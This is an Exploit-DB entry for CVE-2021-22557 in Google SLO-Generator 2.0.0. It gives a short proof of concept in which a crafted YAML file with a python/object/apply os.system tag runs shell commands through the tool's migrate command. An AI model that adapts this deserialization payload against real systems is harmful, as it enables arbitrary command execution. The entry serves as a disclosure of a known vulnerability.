Google SLO-Generator 2.0.0 - Code Execution

Author: Kiran Ghimire
type: local
platform: linux
port: 
date_added: 2021-10-07  
date_updated: 2021-10-07  
verified: 1  
codes: CVE-2021-22557  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comslo-generator-2.0.0.tar.gz  

raw file: 50385.txt  

# Exploit Title: Google SLO-Generator 2.0.0 - Code Execution
# Date: 2021-09-28
# Exploit Author: Kiran Ghimire
# Software Link: https://github.com/google/slo-generator/releases
# Version: <= 2.0.0
# Tested on: Linux
# CVE: CVE-2021-22557

##############################################################################

*Introduction*:
Is a tool to compute and export Service Level Objectives (SLOs), Error
Budgets and Burn Rates, using configurations written in YAML (or JSON)
format.

##############################################################################

*POC:*
1. pip3 install slo-generator==2.0.0
2. 2. Save the below yaml code in a file as exploit.yaml.
   !!python/object/apply:os.system ["id;whoami"]
3.  Run the below command
   slo-generator migrate -b exploit.yaml
##############################################################################